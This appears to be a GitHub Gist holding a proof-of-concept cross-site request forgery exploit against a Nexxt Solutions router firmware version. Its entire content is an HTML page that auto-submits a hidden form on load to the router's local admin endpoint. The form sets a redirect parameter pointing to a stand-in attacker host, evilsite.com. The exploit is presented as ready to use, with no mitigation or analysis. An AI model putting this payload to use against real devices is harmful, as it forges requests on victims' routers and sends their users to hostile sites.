Created
September 27, 2016 23:58
-
-
Save cedriczirtacic/63ef77881ae053362b80a0e0cccc87f4 to your computer and use it in GitHub Desktop.
Nexxt Solutions Router V5.07.43_en_NEX01 CSRF to URL Redirection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body onload='document.forms[0].submit()'> | |
<form action='http://192.168.0.1/goform/SysStatusHandle' method='post'> | |
<input type="hidden" name="CMD" value="WAN_CON" /> | |
<input type="hidden" name="GO" value="http://evilsite.com" /> | |
<input type="hidden" name="action" value='2' /> | |
</form> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment